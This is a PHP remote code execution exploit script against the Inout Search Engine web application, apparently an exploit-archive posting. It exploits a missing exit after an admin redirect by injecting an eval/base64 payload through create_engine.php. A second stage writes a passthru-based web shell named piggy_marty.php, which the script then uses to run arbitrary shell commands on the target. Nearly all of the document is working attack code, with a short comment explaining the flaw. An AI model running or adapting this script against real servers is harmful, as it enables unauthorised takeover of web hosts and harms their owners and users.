|
#!/usr/bin/php -q -d short_open_tag=on <? echo " Inout Search Engine (all version) Remote Code Execution Exploit by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org> Thanks to rgod for the php code and Marty for the Love
"; if ($argc<3) { echo "Usage: php ".$argv[0]." Host Path cmd Host: target server (ip/hostname) Path: path of inoutsearchengine cmd: a Shell command
Example: php ".$argv[0]." localhost /inoutsearchengine/ dir";
die; } /* Vuln Explanation:
Take a look on one of the admin files, the begin should be something like this:
<?php include("config.inc.php"); if(!isset($_COOKIE['admin'])) { header("Location:index.php"); } ?>
this is not a protection for two reasons:
i) everyone can make a cookie with false credentials ii) there isn't any exit or die function after header('Location: index.php')
Now look at create engine.php, and you find that there isn't any parse of the text you send as the engine name..
Besides that the names of the tabs are written into a PHP files to make faster the loading process.. the only limit we have while we inject the code is taht we can't put spaces in the code, otherwise php will end with an error..
*/
error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5);
function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); }
$host=$argv[1]; $path=$argv[2]; $cmd=""; for ($i=3; $i<=$argc-1; $i++){ $cmd.=" ".$argv[$i]; } $cmd=urlencode($cmd);
$port=80; $proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
echo "- Injecting Shell Creator..\r\n"; /* It was too simple to inject directly the shell into the file.. Let's make the process longer :P
*/ $data="term=<?eval(base64_decode(\$_POST[shell]));?>&Submit=Create+New+Engine+%21+&spl=term"; $packet="POST ".$p."admin/create_engine.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."admin/create_engine.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet);
echo "- refreshing data file..\r\n"; $packet="GET ".$p."admin/generate_tabs.php HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Connection: Close\r\n\r\n"; echo "- Creating the real Shell..\r\n"; /* Costumize it as you want.. */ $my_shell = base64_encode('$fp=fopen(\'piggy_marty.php\',\'w\'); fputs($fp,\'<?php error_reporting(0); set_time_limit(0); if (get_magic_quotes_gpc()) { $_GET[cmd]=stripslashes($_GET[cmd]); } echo 666999; passthru($_GET[cmd]); echo 666999; ?>\'); fclose($fp); chmod(\'piggy_marty.php\',777);'); $data="shell=$my_shell"; $packet="POST ".$p."index.php HTTP/1.0\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n"; $packet.="Referer: http://".$host.$path."index.php\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cache-Control: no-cache\r\n\r\n"; $packet.=$data; sendpacketii($packet);
echo "StepX - Executing Shell..\r\n"; $packet="GET ".$p."piggy_marty.php?cmd=$cmd HTTP/1.0\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Cookie: cmd=$cmd\r\n"; $packet.="Connection: Close\r\n\r\n"; sendpacketii($packet); if (strstr($html,"666999")) { echo "Exploit succeeded...\r\n"; $temp=explode("666999",$html); die("\r\n".$temp[1]."\r\n"); }
# Coded With BH Fast Generator v0.1 ?>
|
|
|